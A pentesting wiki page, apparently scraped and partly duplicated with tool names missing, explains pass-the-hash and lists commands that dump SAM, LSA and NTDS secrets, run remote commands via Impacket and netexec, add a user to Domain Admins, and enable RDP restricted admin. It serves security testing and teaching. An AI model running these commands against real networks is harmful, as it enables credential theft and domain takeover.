Pass the hash

MITRE ATT&CK™ Sub-technique T1550.002

Theory

An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with ).

Practice

There are many tools that implement pass-the-hash: (Python) (, , ...), (Python), (C), (C), (Python), (Python) and many more.

The Impacket script (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see ).

secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

(Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as "owned" in (see ).

netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds

(Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in . It works in standalone but also as a module (see ).

netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -u $USER -H $NThash $TARGETS
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

Some Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).

psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
smbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
wmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
atexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
dcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

(Python) has the ability to do it on a set of targets

netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami
netexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami

On Windows, (C) can pass-the-hash and open an elevated command prompt.

sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash

pth-net rpc group members "Domain admins" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER
pth-net rpc group addmem "Domain admins" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER

xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920

Limitations, tips and tricks

UAC limits pass-the-hash

UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.

the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.
the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, "Administrator") to do remote administration tasks. If set to 1, it doesn't.

In short, by default, only the following accounts can fully take advantage of pass-the-hash:

local accounts : the built-in, RID-500, "Administrator" account
domain accounts : all domain accounts with local admin rights

RDP Pass-the-hash

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

WinRM enables pass-the-hash

Testers should look out for environments with WinRM enabled. During the WinRM configuration, the Enable-PSRemoting sets the LocalAccountTokenFilterPolicy to 1, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.

Machine accounts

References

Last updated 5 months ago

Was this helpful?

Practice

There are many tools that implement pass-the-hash: (Python) (, , ...), (Python), (C), (C), (Python), (Python) and many more.

The Impacket script (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see ).

secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

(Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as "owned" in (see ).

netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds

netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -u $USER -H $NThash $TARGETS
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

Some Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).

psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
smbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
wmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
atexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
dcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

(Python) has the ability to do it on a set of targets

netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami
netexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami

On Windows, (C) can pass-the-hash and open an elevated command prompt.

sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash

The (Python) can be used from a Linux system to operate LDAP queries, add a user to a group and so on (LMhash can be ffffffffffffffffffffffffffffffff).

pth-net rpc group members "Domain admins" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER
pth-net rpc group addmem "Domain admins" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER

xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920

Limitations, tips and tricks

UAC limits pass-the-hash

the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.
the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, "Administrator") to do remote administration tasks. If set to 1, it doesn't.

In short, by default, only the following accounts can fully take advantage of pass-the-hash:

local accounts : the built-in, RID-500, "Administrator" account
domain accounts : all domain accounts with local admin rights

RDP Pass-the-hash

must be enabled to allow pass-the-hash attacks over RDP. It is disabled by default, but we can enable it via the DisableRestrictedAdmin registry entry, as follows:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

WinRM enables pass-the-hash

Machine accounts

Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as ). These operations can instead be conducted with a since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.

A domain controller machine account's NT hash can be used with pass-the-hash to .